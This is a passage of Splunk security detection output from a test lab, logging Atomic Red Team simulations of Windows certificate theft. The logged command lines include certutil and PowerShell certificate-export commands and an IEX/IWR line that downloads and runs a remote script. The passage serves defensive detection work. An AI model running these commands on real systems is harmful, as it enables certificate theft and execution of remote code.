1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="0x1018", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="0x1018", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="4120", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682704581, search_name="ESCU - Windows Steal Authentication Certificates Export Certificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682704576.275251000", lastTime="2023-04-28T16:13:58", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", process_id="4120", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-certificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0x11c0", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="0x6a4", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator" 1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0x11c0", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="0x6a4", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="Administrator", risk_object_type="user", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator" 1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="\"powershell.exe\" & {IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) certutil.exe -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx}", parent_process_id="4544", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="1700", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator" 1682703990, search_name="ESCU - Certutil exe certificate extraction - Rule", analyticstories="Cloud Federated Credential Abuse", analyticstories="Living Off The Land", analyticstories="Windows Certificate Services", analyticstories="Windows Persistence Techniques", annotations="{\"analytic_story\": [\"Windows Persistence Techniques\", \"Cloud Federated Credential Abuse\", \"Living Off The Land\", \"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 90, \"nist\": [\"DE.CM\"]}", annotations._all="CIS 10", annotations._all="Windows Persistence Techniques", annotations._all="Living Off The Land", annotations._all="Windows Certificate Services", annotations._all="Cloud Federated Credential Abuse", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="nist", annotations.analytic_story="Windows Persistence Techniques", annotations.analytic_story="Cloud Federated Credential Abuse", annotations.analytic_story="Living Off The Land", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.nist="DE.CM", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703986.653522000", lastTime="2023-04-28T16:13:23", parent_process="\"powershell.exe\" & {IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) certutil.exe -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx}", parent_process_id="4544", process="\"C:\\Windows\\system32\\certutil.exe\" -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx", process_id="1700", process_name="certutil.exe", risk_message="An instance of $parent_process_name$ spawning certutil.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting export a certificate.", risk_object="Administrator", risk_object_type="user", risk_score="63.0", savedsearch_description="This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", threat_object="certutil.exe", threat_object_type="process", user="Administrator" 1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="0xa0c", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="0x1094", parent_process_name="powershell.exe", process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="0xa0c", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="2572", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682703773, search_name="ESCU - Windows Steal Authentication Certificates Export PfxCertificate - Rule", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="CIS 10", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682703768.353640000", lastTime="2023-04-28T16:13:47", parent_process_id="4244", parent_process_name="powershell.exe", process="\"powershell.exe\" & {$mypwd = ConvertTo-SecureString -String \\\"\"AtomicRedTeam\\\"\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", process_id="2572", process_name="powershell.exe", risk_message="An instance of powershell.exe spawning powershell.exe was identified on endpoint mswin-server.attackrange.local by user Administrator attempting to export a certificate from the local Windows Certificate Store.", risk_object="Administrator", risk_object_type="user", risk_score="36.0", savedsearch_description="The following analytic identifies the use of export-pfxcertificate, the PowerShell cmdlet, being utilized on the command-line in an attempt to export the certifcate from the local Windows Certificate Store.", threat_object="powershell.exe", threat_object="powershell.exe", threat_object_type="process", threat_object_type="process", user="Administrator" 1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.321", file_name="local_machine_my_1_atomicredteam.com.pfx", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_1_atomicredteam.com.pfx", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.296", file_name="local_machine_my_1_atomicredteam.com.der", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_1_atomicredteam.com.der", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.296", file_name="local_machine_my_0_atomicredteam.com.pfx", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_0_atomicredteam.com.pfx", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:14:20.273", file_name="local_machine_my_0_atomicredteam.com.der", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\local_machine_my_0_atomicredteam.com.der", firstTime="2023-04-28T16:14:20", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:14:20", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:13:53.770", file_name="atomicredteam.pfx", file_path="C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\atomicredteam.pfx", firstTime="2023-04-28T16:13:53", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:13:53", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 